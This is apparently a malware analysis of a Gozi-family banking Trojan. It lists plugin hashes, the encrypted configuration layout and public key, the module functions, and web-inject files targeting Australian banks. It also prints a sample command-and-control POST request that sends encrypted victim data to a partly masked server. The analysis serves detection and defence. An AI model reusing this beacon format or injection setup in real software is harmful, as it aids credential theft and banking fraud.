SHA1:
- SHA1 loader stage 1
- b974346e2b3a32720d4a214ca2b18a0032867f12
- SHA1 loader.dll x32 stage 2
- 1c8e47942eb0bdd32fe2883dee5953de6e06b9b8
- SHA1 loader.dll x64 stage 2
- 1a3bceab8c90779fd06760a037a347d21849fe3b
Plugins:
- vnc.dll x32
- 016380ad20f90f73452445ed98a6dff61b0c85cd
- vnc.dll x64
- c438001acfdb892c51c803655807c74008f69fc6
- socks.dll x32
- b62d2ed65fff0a703697119180b1d2795e39b2ee
- socks.dll x64
- 3043a90a3c241af9abc06f9970a01522b43f7195
- rt.dll x32
- f6760c7e5d0ba32faf63c80b54eac8b689fd1722
- rt.dll x64
- 6ac9b097615fa5e87cf1907311aec20add396dcf
- netwrk.dll x32
- 495cceb288e0448752951ab3204e537ce93e0384
- netwrk.dll x64
- eeb711d28ecd700ef3e09d4a939dccadc693764f
- microsoftedgecp.dll x32
- 5744368c2c0698d5fc1fae6a2727ade044536d08
- microsoftedgecp.dll x64
- 67913bbbdfbe1a23c2431b547e4c9053021860e3
- mail.dll x32
- f09a7a74425aa13fc0983de1e01e09e5b37dd619
- mail.dll x64
- 65eb56f226d30fee4dd1ff959b240d51d2c11b28
- keylog.dll x32
- 876a6e4fae43fcb56136ba0c92670869f292266b
- keylog.dll x64
- 00eb9b1f5cd1224cc8b702ae1046ed776960c185
- iexplore.dll x32
- 2162e531aaa9f619614268d89b34d46e6180d37a
- iexplore.dll x64
- c2b48a41224624be5cc0e7d2b6ae8b9cb96cf047
- firefox.dll x32
- 912388017d805b758ea29bcad8bf009d85822c72
- firefox.dll x64
- f0812d9899fa5b2e76a4bb00e95abaeae260804a
- explorer.dll x32
- 2e14d58151660e70cd436d0f47ef61be10ee9209
- explorer.dll x64
- b7e5955dc9373425edb49017f26d3e269eb417e9
- chrome.dll x32
- 2fa8fd2f66ecf4f7db886eb1d765aa76e9b64aac
- chrome.dll x64
- 2b5e45bb3fa8bb7e22b4cb02897c14966c389bff
- browsers.dll x32
- 3f3732f6d3f8ad9db2dc227aab237bdaea982902
- browsers.dll x64
- e3e6081df357e9d55873c91d00e693fb515e24cd
- bl.dll x32
- ea9350ce1fe2ecd1776424ce5aa72f5fbb48448c
- bl.dll x64
- f8a783a3438f7d73d966d885846f874f7382d298
A banking Trojan for 32- and 64-bit Windows versions. Its executable file contains an encrypted container which stores a loader and an initial configuration. From the PE file, the Trojan reads Security Data Directory, which stores information on configuration of modules:
struct cfginfo_t
{
DWORD size; //configuration size
WORD magic; //0x334A
WORD unk1;
}Then the blocks themselves follow:
struct cfgblock_t
{
DWORD idname; //name of the plugin ^ key
DWORD size; //size of the plugin ^ key
DWORD key; //the key used to encrypt with XOR every field of this structure
DWORD rva; //rva of the data ^ key
};The number of blocks is calculated according to the following formula:
n=(cfginfo_t.size-0xC)/0x10
The result of decryption is a public key in the polarssl format, which looks the following way in the PEM format:
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDD3AfU4ayUEHchQ3H0W1/d3ziW
VNCFHWaAm8mJq6hQwn03GNGV7hOICH8h/+dZGEwYWVnRq128QMPZTIj0b+iqHKlM
sHzxEIZlWUVvnfbx6unDAC8aJXovmePrPvbHJ1FrplzlbILiPLvofh7pXzTdfcDQ
e3wfV7cbxJ3DXessqwIDAQAB
-----END PUBLIC KEY-----The previous Gozi version left unused strings in the basic configuration of the Trojan.
To connect to a remote server, the Trojan requires its address, a server key, group name and a public key, and also two files of the library LOADER.dll x32/x64. Requests are encrypted using the serpent+base64 algorithms with additional substitution of some characters; server responses are encrypted using the RSA + serpent algorithms and compressed with aplib.
Then the loader.dll library is loaded; the data is sent to the command and control server using the POST requests. The payload is sent in the format multipart/form-data:
POST /index.html HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=b8bf4e8dfe2ca714
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Content-Length: 309
Host: 185.***.***.19
--b8bf4e8dfe2ca714
Content-Disposition: form-data; name="bjdu"
jR5u5cY2EI3FkzX/y1l2gdYYjDvqNnMdEva1W_/2BcENsVuze9Zb6mc/f9rkXZw1X/fXyeq8bAJpYM/0sthsZwlgF7yG3t3V/Vcxct0rTybjIqETZg94C/Kdk9NGIv0up_2FSQzWu5Au3/oYrMIKkqEXD_2Fa8a0JF_/2B63vuyz/zbp7ODpeVvi/5o2C_2F4VY/7C_2BX6DzWW/FeNdnBVU/S
--b8bf4e8dfe2ca714--The following fields are indicated in User-Agent:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0)
Gecko/20100101 Firefox/50.0
OS version 6.00
Subsystem version 1.00Creators of the Trojan embedded a restriction which allows the malicious program to operate with ntdll.dll, the value of the “OS version” field in the PE header must be >=6, i.e. with Microsoft Windows 7 and its later versions.
Requests are encrypted and have the following parameters:
{'uptime': '1497', 'group': '1201117', 'type': '0', 'crc': '00000000', 'arc': '0', 'version': '300499', 'user': '137dfe28b759ae0de8853ec3503d35e9', 'soft': '2', 'id': '8576b0d0'}where id is the value CRC-32/JAMCRC(plugname.upper()) of the plugin name in uppercase. Response packets are also encrypted, and, for some types of requests, they are compressed using aplib.
The loader downloads the following basic modules:
bl.dll 0x8576b0d0
explorer.dll 0x224c6c42
netwrk.dll 0x45a0fcd0
rt.dll 0xd6306e08
baseconfig 0xd722afcbThe baseconfig module stores the basic configuration, which contains addresses of the additional command and control servers and a master key for the connection to the server.
Other modules have the following functions:
- explorer.dll—the main module of the Trojan. It loads and executes the rest of the components using the basic plugins (bl.dll, rt.dll, netwrk.dll);
- bl.dll—performing of web injections, various types of interactions with named Windows pipes, execution of files from the memory, encryption;
- rt.dll—interaction with the Windows system registry, with files, operations with strings;
- netwrk.dll—functions of operation with the network.
The module explorer.dll executes several task types:
- Check for any updates for the Trojan;
- Download from a remote server plugins for browsers used for web injections;
- Download web-injection configurations from a remote server;
- Obtain personal tasks, including those requiring the download of additional plugins;
- Remote computer administration.
In order to perform web injections, the Trojan uses its own configurable plugin:
- browsers.dll 0xe6954637
- iexplore.dll 0x5f92dac2
- firefox.dll 0x309d98ff
- microsoftedgecp.dll 0x7f23179c
- chrome.dll 0x9eff4536
The configuration data for execution of web injections are packed in a ZIP file and compressed with aplib:
au_com_bankofmelbourne_bbo.sig
au_com_banksa_bbo.sig
au_com_stgeorge_bbo.sig
Expro.sig
main.sig
transactive_corp.sig
transman_corp.sig
westpac_corp.sig